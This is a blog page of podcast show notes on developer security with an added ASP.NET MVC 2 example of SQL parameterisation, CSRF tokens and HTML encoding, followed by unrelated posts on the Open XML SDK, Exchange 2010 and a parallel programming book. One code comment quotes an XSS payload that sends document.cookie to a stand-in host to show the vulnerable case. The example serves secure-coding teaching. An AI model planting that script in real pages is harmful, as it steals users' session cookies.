Herding Code 75: Barry Dorrans on Developer Security


This week on Herding Code, Barry Dorrans educates, entertains, insults and scares us with his expert commentary on application security, threat modeling, analysis tools and common attacks.  You’ve been waiting for this show.  I just know it.  Listen in as Barry talks security, pimps his new book, and comments on his new position at Microsoft, book burnings, guns, money, proper pronunciation and Jon’s bald head.

  • Scott K shares that public-facing applications and services seem to get the least attention when it comes to security – until there’s an audit. Barry talks about the lack of security education and how training should be baked in from the ground up.
  • Jon notes that folks don’t start off projects thinking about security.  First you code and then you worry about the risk.  Barry speaks to the Security Development Lifecycle (SDL) and continuous threat modeling.
  • Scott K asks if there is a security checklist which developers should consult when developing a web application.  Barry references his book, OWASP, CWE and MITRE.  Barry states that you can’t think like a hacker, but you can think about the risks and “what happens if this goes wrong” or “I leak this information” or “there is a cross-site scripting attack.”
  • Jon notes there are some security measures which are baked into the .NET Framework.  Barry talks about a defense-in-depth strategy and the Web Protection Library (WPL).
  • Barry dives into a few of the security and code analysis tools like CAT.NET and FxCop which are available for Visual Studio.  He also notes, by the way, that no tool offers a silver bullet.
  • Scott K asks where emphasis should be placed when implementing security measures.  Barry responds by putting his security hat on and assuming that all users are scum.  Trust no one!
  • The guys get into encoding rules (when and where), XSS, SQL Injection and Cross-site request forgery.  Jon asks more about the measures built into ASP.NET Webforms and ASP.NET MVC which help prevent attacks.
  • Kevin asks a question about automatic encoding by the framework.  Barry states this is a tricky solution to implement and suggests that frameworks should provide tools but developers should handle the encoding manually. Jon notes the new syntax in MVC 2 which facilitates this approach.
  • Jon asks about testing frameworks and asks Barry for a checklist of steps which developers must complete if they wish to secure their applications.  Barry rattles off a bunch of must-do actions, pimps his book and pokes fun at American money.
  • The guys talk about RIA, Silverlight and Flash and briefly touch upon security benefits and issues.  And then they discuss social engineering security/privacy issues.
  • Scott K moves away from web applications and services.  What about client applications?  Barry talks about trusted sources, and the .NET and Java sandboxes.  And the guys speak of OS sandboxes, virtualizing applications and Code Access Security (CAS).
  • Barry talks about FoxPro thanks to a Twitter question from @jglazano and the show finishes up with talk about blue and black hats, security snake oil and scary security stories.  But wait!  Jon remembers he wanted to talk about OpenID and the show continues with a discussion about OpenID, CardSpace, OAuth and OAuth WRAP.
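The encode-on-output rule, the MVC 2 syntax Jon mentions, and the built-in CSRF and SQL injection defences the guys discuss above, as an added example in ASP.NET MVC 2 on .NET 4. This is not code from the episode, from Barry's book or from the framework's own samples; the controller, the model, the Reviews table and the connection string are invented for illustration.

```csharp
// Added example, not from the episode or Barry Dorrans' book. Assumes ASP.NET MVC 2
// on .NET 4; ReviewViewModel, CommentController, the Reviews table and the
// connection string are invented.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.Mvc;

public class ReviewViewModel
{
    public int Id { get; set; }
    public string Author { get; set; }
    public string Body { get; set; }
}

public class CommentController : Controller
{
    // Assumption: a Reviews table with non-null Author and Body columns.
    private const string ConnectionString =
        "Server=.;Database=Reviews;Integrated Security=true";

    // GET /Comment/Show/5
    public ActionResult Show(int id)
    {
        var model = new ReviewViewModel { Id = id };
        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = conn.CreateCommand())
        {
            // SQL injection defence: the id travels as a typed parameter, so it
            // can never change the shape of the statement. Never build this
            // string with "... WHERE Id = " + id.
            cmd.CommandText = "SELECT Author, Body FROM Reviews WHERE Id = @id";
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                if (!reader.Read())
                    throw new HttpException(404, "Review not found");
                model.Author = reader.GetString(0);
                model.Body = reader.GetString(1);
            }
        }
        // Data is stored raw; encoding is an output concern (see the view below).
        return View(model);
    }

    // POST /Comment/Create
    // [ValidateAntiForgeryToken] compares the __RequestVerificationToken form
    // field with the matching cookie and rejects the request if they do not
    // agree, which is the CSRF defence built into MVC.
    [HttpPost]
    [ValidateAntiForgeryToken]
    public ActionResult Create(ReviewViewModel input)
    {
        // ... persist input with a parameterised INSERT, as in Show ...
        return RedirectToAction("Show", new { id = input.Id });
    }
}

/* Show.aspx, the strongly typed view for Show above (markup, shown as a comment):

   <%-- Vulnerable: writes Model.Author verbatim, so an author of
        <script>document.location='http://evil.example/'+document.cookie</script>
        runs in every reader's browser. --%>
   <p><%= Model.Author %></p>

   <%-- MVC 2 syntax: <%: x %> is <%= HttpUtility.HtmlEncode(x) %> unless x is an
        IHtmlString (e.g. an MvcHtmlString from a helper), so helpers that already
        produce safe markup are not double-encoded. --%>
   <p><%: Model.Author %></p>

   <%-- Encoding is per context. HtmlEncode also escapes the double quote, so the
        value is safe inside a double-quoted attribute; it is NOT safe inside a
        <script> block or a URL, which need their own encoders. --%>
   <p title="<%: Model.Author %>"><%: Model.Body %></p>

   <% using (Html.BeginForm("Create", "Comment")) { %>
       <%: Html.AntiForgeryToken() %>   <%-- hidden field + cookie pair --%>
       <%: Html.TextBoxFor(m => m.Body) %>
       <input type="submit" value="Post" />
   <% } %>
*/
```

The point Barry makes about automatic encoding shows up in the view: the framework supplies `<%: %>`, `Html.AntiForgeryToken()` and `SqlParameter`, but the developer still has to pick the encoder that matches the output context and remember to use it on every untrusted value.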

Show Links:

Show notes compiled by Ben Griswold. Thanks!

Download / Listen:

Herding Code 75: Barry Dorrans on Developer Security


Enclosure: HerdingCode-0075-Barry-Dorrans-on-Developer-Security.mp3

Douglas Adams lecture

Announcing the Release of the Open XML SDK 2.0


Today, I am really excited to announce the worldwide availability of the Open XML SDK 2.0 for Microsoft Office! The Open XML SDK plays an integral part in creating Office document solutions that work on the client or server. The Open XML SDK allows you to create, consume, and manipulate Open XML files without needing to automate Office client applications. Combining the power of Office Services and the Open XML SDK enables even more scenarios, such as rich server-side document assembly solutions. No longer will you need to pay special attention to one of Office's most popular knowledge base articles that talks about how automating Office client applications on the server is not supported (http://support.microsoft.com/kb/257757).

Development of the Open XML SDK 2.0 spanned almost two years and involved the release of four Technical Previews in addition to the final release announced today. Your feedback via the blogs, MSDN forums, www.openxmldeveloper.com forums, and Microsoft Connect site helped shape the overall design of the SDK. Thank you so much for your support and feedback! Please feel free to continue sending us feedback with respect to the Open XML SDK.

Download the SDK

Download the Open XML SDK 2.0 for Microsoft Office
This download provides strongly typed part and content classes for use with Office 2007 & Office 2010 Open XML documents. http://www.microsoft.com/downloads/details.aspx?FamilyID=c6e744e5-36e9-45f5-8d8c-331df206e0d0

Release Notes

  • Open XML SDK 2.0 is freely redistributable by any solution provider implementing the formats
  • Office applications are not required to use the Open XML SDK 2.0, and no software purchase is required. Developers can freely use the Open XML SDK to build document processing solutions for Microsoft Office files and for other implementations of the IS29500 standard

Learn More about the Open XML SDK

Over the past year and a half, I have shown you guys a lot of real world scenarios/solutions that are built with the SDK. Here is a summary of links that will help you learn more about the Open XML SDK:

  • MSDN
  • This site is your one-stop shop for finding all information related to Open XML and the Open XML SDK
  • Office Developer Center
  • Office Visual-How-To sites
  • An overview of Open XML SDK 2.0 for Microsoft Office
  • Class Library References
  • Microsoft Office File Format Documents
  • YouTube Videos
  • Forum & Blogs
  • Conference Presentations

In a future post I will outline the improvements we made to the Open XML SDK 2.0 compared to the December 2009 CTP.

Zeyad Rajabi


Brian Jones: Office Extensibility / Fri, 12 Mar 2010 22:49:12 GMT

Whitepaper: The Microsoft Large Mailbox Vision


Giving your users the ability to store more e-mail has many advantages. Large mailboxes keep e-mail on the Exchange Server instead of allowing it to be scattered in Outlook Data Files (.PST files). That helps reduce the risk of data loss, improve regulatory compliance, and increase productivity among both workers and IT staff. The main barrier to implementing large mailboxes is the perceived cost and complexity of storing large amounts of e-mail data.

Microsoft® Exchange Server 2010 is specifically designed to overcome these barriers. It enables you to give your users larger mailboxes at lower cost without sacrificing performance or reliability. Built-in high availability and disaster recovery, storage system improvements, and self-healing from disk faults let you use large, inexpensive disks in configurations that maximize data redundancy. And, Exchange Server 2010 lets you keep your users online during mailbox moves. With these changes, the benefits of large mailboxes are now within the grasp of all organizations.


Download details: Exchange 2010 Large Mailbox Vision Whitepaper

Parallel Programming Patterns Book


Friday, February 26, 2010 – 4:41 pm

Since running the Patterns of Parallel Programming Workshop at PDC 2009 we (patterns & practices) have been working on what to do next to help people understand the opportunities and challenges afforded by parallelism and some of the new features of Visual Studio 2010.

We’re in the process of kicking off this project now…

We have a Parallel Patterns CodePlex site and will be posting content there and asking for feedback. Currently you can read the working outline for the book and see the first cut at one of the samples.

In the next five or six months we’ll be creating the content for the book. If you’re interested in providing feedback then please review the content and add feedback as a discussion item.

http://www.ademiller.com/blogs/tech/2010/02/parallel-programming-patterns-book/